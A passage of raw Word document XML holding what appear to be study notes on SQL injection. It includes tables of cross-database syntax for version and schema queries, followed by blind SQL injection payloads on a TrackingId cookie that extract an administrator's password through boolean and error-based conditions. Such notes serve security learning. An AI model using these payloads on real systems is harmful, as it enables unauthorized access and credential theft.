          <w:p w14:paraId="734DB5F5" w14:textId="77777777" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="00CC3B25" w:rsidP="00CC3B25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Microsoft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="074A6FE5" w14:textId="77777777" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="00CC3B25" w:rsidP="00CC3B25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'foo'+'bar'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w14:paraId="43E06315" w14:textId="77777777" w:rsidTr="00CC3B25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="720F259F" w14:textId="77777777" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="00CC3B25" w:rsidP="00CC3B25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PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A233621" w14:textId="77777777" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="00CC3B25" w:rsidP="00CC3B25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'foo'||'bar'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w14:paraId="7D24BA7D" w14:textId="77777777" w:rsidTr="00CC3B25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12460754" w14:textId="77777777" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="00CC3B25" w:rsidP="00CC3B25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2393EE2B" w14:textId="320D6255" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="00CC3B25" w:rsidP="00CC3B25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'foo' 'bar'</w:t>
            </w:r>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t> [space between the two strings]</w:t>
            </w:r>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="de-DE"/>
              </w:rPr>
              <w:br/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CONCAT('foo','bar')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A113318" w14:textId="00E228FE" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FE6F03F" w14:textId="77777777" w:rsidR="00065FC4" w:rsidRPr="00384A1B" w:rsidRDefault="00065FC4" w:rsidP="00065FC4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Querying the database type and version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911"/>
      </w:tblGrid>
      <w:tr w:rsidR="00065FC4" w:rsidRPr="00384A1B" w14:paraId="5B831F1B" w14:textId="77777777" w:rsidTr="00065FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10A32A61" w14:textId="77777777" w:rsidR="00065FC4" w:rsidRPr="00384A1B" w:rsidRDefault="00065FC4" w:rsidP="00065FC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5E9D81A2" w14:textId="77777777" w:rsidR="00065FC4" w:rsidRPr="00384A1B" w:rsidRDefault="00065FC4" w:rsidP="00065FC4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SELECT banner FROM v$version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SELECT version FROM v$instance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00065FC4" w:rsidRPr="00384A1B" w14:paraId="3F3C87A0" w14:textId="77777777" w:rsidTr="00065FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3C6A1C4E" w14:textId="77777777" w:rsidR="00065FC4" w:rsidRPr="00384A1B" w:rsidRDefault="00065FC4" w:rsidP="00065FC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eastAsia="de-DE"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4DCCA757" w14:textId="77777777" w:rsidR="00065FC4" w:rsidRPr="00384A1B" w:rsidRDefault="00065FC4" w:rsidP="00065FC4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</w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00065FC4" w:rsidRPr="00384A1B" w14:paraId="19C5327E" w14:textId="77777777" w:rsidTr="00065FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="003AEB52" w14:textId="77777777" w:rsidR="00065FC4" w:rsidRPr="00384A1B" w:rsidRDefault="00065FC4" w:rsidP="00065FC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Microsoft</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="504D474B" w14:textId="3F584063" w:rsidR="008A2499" w:rsidRPr="00384A1B" w:rsidRDefault="008A2499" w:rsidP="00065FC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7F90EA54" w14:textId="749E8CB7" w:rsidR="00065FC4" w:rsidRPr="00384A1B" w:rsidRDefault="00065FC4" w:rsidP="00065FC4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SELECT @@version</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01893D73" w14:textId="37AAD907" w:rsidR="00C36527" w:rsidRPr="00384A1B" w:rsidRDefault="00C36527" w:rsidP="00065FC4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</w:p>
          <w:p w14:paraId="3054AAD3" w14:textId="77777777" w:rsidR="008A2499" w:rsidRPr="00384A1B" w:rsidRDefault="008A2499" w:rsidP="00065FC4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</w:p>
          <w:p w14:paraId="3FB4E515" w14:textId="102BE8DC" w:rsidR="00065FC4" w:rsidRPr="00384A1B" w:rsidRDefault="00065FC4" w:rsidP="00065FC4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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00065FC4" w:rsidRPr="00384A1B" w14:paraId="50D9636B" w14:textId="77777777" w:rsidTr="00065FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D2ED9C6" w14:textId="77777777" w:rsidR="00065FC4" w:rsidRPr="00384A1B" w:rsidRDefault="00065FC4" w:rsidP="00065FC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PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77E02CB7" w14:textId="2336D068" w:rsidR="00065FC4" w:rsidRPr="00384A1B" w:rsidRDefault="00065FC4" w:rsidP="00065FC4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 xml:space="preserve">SELECT </w:t>
            </w:r>
            <w:proofErr w:type="gramStart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version(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08E5D810" w14:textId="77777777" w:rsidR="00C36527" w:rsidRPr="00384A1B" w:rsidRDefault="00C36527" w:rsidP="00065FC4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</w:p>
          <w:p w14:paraId="49655E24" w14:textId="139C8D29" w:rsidR="00065FC4" w:rsidRPr="00384A1B" w:rsidRDefault="00065FC4" w:rsidP="00065FC4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</w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F4B42C1" w14:textId="054CE5F2" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ADFFBB2" w14:textId="77777777" w:rsidR="00C36527" w:rsidRPr="00384A1B" w:rsidRDefault="00C36527" w:rsidP="00C36527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Listing the contents of the database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4"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C36527" w:rsidRPr="00384A1B" w14:paraId="7A48F0D9" w14:textId="77777777" w:rsidTr="00C36527">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5983A588" w14:textId="77777777" w:rsidR="00C36527" w:rsidRPr="00384A1B" w:rsidRDefault="00C36527" w:rsidP="00C3652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557C2D76" w14:textId="48CACCF5" w:rsidR="00C36527" w:rsidRPr="00384A1B" w:rsidRDefault="00C36527" w:rsidP="00C36527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SELECT * FROM all_tables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SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2725B47D" w14:textId="77777777" w:rsidR="008A2499" w:rsidRPr="00384A1B" w:rsidRDefault="008A2499" w:rsidP="00C36527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</w:pPr>
          </w:p>
          <w:p w14:paraId="2A723430" w14:textId="59CE2C09" w:rsidR="00C36527" w:rsidRPr="00384A1B" w:rsidRDefault="00C36527" w:rsidP="00C36527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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36527" w:rsidRPr="00384A1B" w14:paraId="0553D41F" w14:textId="77777777" w:rsidTr="00C36527">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DD8EF1F" w14:textId="77777777" w:rsidR="00C36527" w:rsidRPr="00384A1B" w:rsidRDefault="00C36527" w:rsidP="00C3652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Microsoft</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DC0F73D" w14:textId="77777777" w:rsidR="00695BDC" w:rsidRPr="00384A1B" w:rsidRDefault="00695BDC" w:rsidP="00C3652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Postgre</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B4CA5BF" w14:textId="7F529057" w:rsidR="00695BDC" w:rsidRPr="00384A1B" w:rsidRDefault="00695BDC" w:rsidP="00C36527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5AF41C43" w14:textId="77777777" w:rsidR="00C36527" w:rsidRPr="00384A1B" w:rsidRDefault="00C36527" w:rsidP="00C36527">
            <w:pPr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SELECT * FROM information_schema.tables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 xml:space="preserve">SELECT * FROM information_schema.columns WHERE </w:t>
            </w:r>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve">table_name 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= 'TABLE-NAME-HERE'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="267F8667" w14:textId="17E8D9B1" w:rsidR="00C36527" w:rsidRPr="00384A1B" w:rsidRDefault="00C36527" w:rsidP="00C36527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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C9A5590" w14:textId="31032AB5" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="00CC3B25" w:rsidP="00A40A6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618A24E3" w14:textId="0A77B6CF" w:rsidR="00C36527" w:rsidRPr="00384A1B" w:rsidRDefault="00C36527" w:rsidP="00A40A6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for first request: table_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAE7788" w14:textId="1C3152FB" w:rsidR="00C36527" w:rsidRPr="00384A1B" w:rsidRDefault="00C36527" w:rsidP="00A40A6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for second request: column_name, data_type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489092E6" w14:textId="1317F421" w:rsidR="008A2499" w:rsidRPr="00384A1B" w:rsidRDefault="008A2499" w:rsidP="008A2499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Exploiting blind SQL injection by triggering conditional responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FD4B6A" w14:textId="59A1FDEF" w:rsidR="00F1209A" w:rsidRPr="00384A1B" w:rsidRDefault="00F1209A" w:rsidP="008A2499">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="150"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>the application behaves differently depending on whether the query returns any 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31"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C54163" w:rsidRPr="00384A1B" w14:paraId="2B836205" w14:textId="77777777" w:rsidTr="00C54163">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BC6F7A9" w14:textId="77777777" w:rsidR="00C54163" w:rsidRPr="00384A1B" w:rsidRDefault="00C54163" w:rsidP="00C5416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0B17CF96" w14:textId="77777777" w:rsidR="00C54163" w:rsidRPr="00384A1B" w:rsidRDefault="00C54163" w:rsidP="00C54163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proofErr w:type="gramStart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SUBSTR(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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'foobar', 4, 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C54163" w:rsidRPr="00384A1B" w14:paraId="0E144349" w14:textId="77777777" w:rsidTr="00C54163">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A5419F4" w14:textId="77777777" w:rsidR="00C54163" w:rsidRPr="00384A1B" w:rsidRDefault="00C54163" w:rsidP="00C5416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Microsoft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37749210" w14:textId="77777777" w:rsidR="00C54163" w:rsidRPr="00384A1B" w:rsidRDefault="00C54163" w:rsidP="00C54163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proofErr w:type="gramStart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SUBSTRING(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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'foobar', 4, 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C54163" w:rsidRPr="00384A1B" w14:paraId="666B82A0" w14:textId="77777777" w:rsidTr="00C54163">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A660855" w14:textId="77777777" w:rsidR="00C54163" w:rsidRPr="00384A1B" w:rsidRDefault="00C54163" w:rsidP="00C5416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PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="775A8349" w14:textId="77777777" w:rsidR="00C54163" w:rsidRPr="00384A1B" w:rsidRDefault="00C54163" w:rsidP="00C54163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proofErr w:type="gramStart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SUBSTRING(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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'foobar', 4, 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C54163" w:rsidRPr="00384A1B" w14:paraId="6FCB8650" w14:textId="77777777" w:rsidTr="00C54163">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="457F1EBF" w14:textId="77777777" w:rsidR="00C54163" w:rsidRPr="00384A1B" w:rsidRDefault="00C54163" w:rsidP="00C5416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38CB716F" w14:textId="77777777" w:rsidR="00C54163" w:rsidRPr="00384A1B" w:rsidRDefault="00C54163" w:rsidP="00C54163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proofErr w:type="gramStart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SUBSTRING(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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'foobar', 4, 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54BEC338" w14:textId="2C211497" w:rsidR="00C36527" w:rsidRPr="00384A1B" w:rsidRDefault="00C54163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returns ba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF1153A" w14:textId="2F5C37CF" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="00CC3B25" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FD5DB75" w14:textId="2B1BBCC4" w:rsidR="005474B7" w:rsidRPr="00384A1B" w:rsidRDefault="005474B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SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2565FCBA" w14:textId="77777777" w:rsidR="005474B7" w:rsidRPr="00384A1B" w:rsidRDefault="005474B7" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7508CF43" w14:textId="71570464" w:rsidR="00423B5C" w:rsidRPr="00384A1B" w:rsidRDefault="00423B5C" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F4C7B1" w14:textId="77777777" w:rsidR="00423B5C" w:rsidRPr="00384A1B" w:rsidRDefault="00423B5C" w:rsidP="00423B5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…xyz' AND '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F8368C" w14:textId="369DABBD" w:rsidR="00423B5C" w:rsidRPr="00384A1B" w:rsidRDefault="00423B5C" w:rsidP="00423B5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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…xyz' AND '1'='2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CA0497" w14:textId="32505435" w:rsidR="00423B5C" w:rsidRPr="00384A1B" w:rsidRDefault="00423B5C" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EBB540A" w14:textId="169BD74C" w:rsidR="00423B5C" w:rsidRPr="00384A1B" w:rsidRDefault="00423B5C" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Check if table “users” exists:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E974620" w14:textId="1D4E36A8" w:rsidR="00423B5C" w:rsidRPr="00384A1B" w:rsidRDefault="00423B5C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TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5959AB80" w14:textId="4CB81EB9" w:rsidR="00423B5C" w:rsidRPr="00384A1B" w:rsidRDefault="00423B5C" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E7F8D7F" w14:textId="2343F1E3" w:rsidR="00423B5C" w:rsidRPr="00384A1B" w:rsidRDefault="00423B5C" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Check if the username “administrator” exists:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8553D8" w14:textId="1274115F" w:rsidR="00423B5C" w:rsidRPr="00384A1B" w:rsidRDefault="00423B5C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TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A62413" w14:textId="1ECF6771" w:rsidR="00423B5C" w:rsidRPr="00384A1B" w:rsidRDefault="00423B5C" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15C02189" w14:textId="6F6FAD5A" w:rsidR="00423B5C" w:rsidRPr="00384A1B" w:rsidRDefault="00423B5C" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Determine the length of password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB14A83" w14:textId="1A330A4D" w:rsidR="00423B5C" w:rsidRPr="00384A1B" w:rsidRDefault="00423B5C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TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)=1)='a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331EF93A" w14:textId="77777777" w:rsidR="004D666C" w:rsidRPr="00384A1B" w:rsidRDefault="004D666C" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059AECE8" w14:textId="62256FB0" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="00F03E3F" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B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Attac</w:t>
      </w:r>
      <w:r w:rsidR="005474B7" w:rsidRPr="00384A1B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k</w:t>
      </w:r>
      <w:r w:rsidR="00F1209A" w:rsidRPr="00384A1B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:</w:t>
      </w:r>
      <w:r w:rsidR="00423B5C"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TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61563221" w14:textId="633A399E" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="00F1209A" w:rsidP="00C26790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Inducing conditional responses by triggering SQL errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF8A0C4" w14:textId="5139DB9A" w:rsidR="005474B7" w:rsidRPr="00384A1B" w:rsidRDefault="00C26790" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cause a database error if the condition is true, not if the condition is false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AA9523" w14:textId="322832A9" w:rsidR="005474B7" w:rsidRPr="00384A1B" w:rsidRDefault="005474B7" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B2C5A28" w14:textId="399D2E5C" w:rsidR="005474B7" w:rsidRPr="00384A1B" w:rsidRDefault="005474B7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384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Check if username “administrator</w:t>
      </w:r>
      <w:r w:rsidR="004D666C" w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> exists:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C2CAB8" w14:textId="29C80387" w:rsidR="005474B7" w:rsidRPr="00384A1B" w:rsidRDefault="005474B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TrackingId=xyz'||(SELECT CASE WHEN </w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B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(1=1)</w:t>
      </w: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 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10531A3D" w14:textId="512FFD81" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="00CC3B25" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="391D22A5" w14:textId="6BC87855" w:rsidR="005474B7" w:rsidRPr="00384A1B" w:rsidRDefault="005474B7" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Determine the length of password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405BE74E" w14:textId="7F71F0CE" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="005474B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TrackingId=xyz'||(SELECT CASE WHEN </w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B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LENGTH(password)=1</w:t>
      </w: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 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528BECC0" w14:textId="5D066C99" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="00CC3B25" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
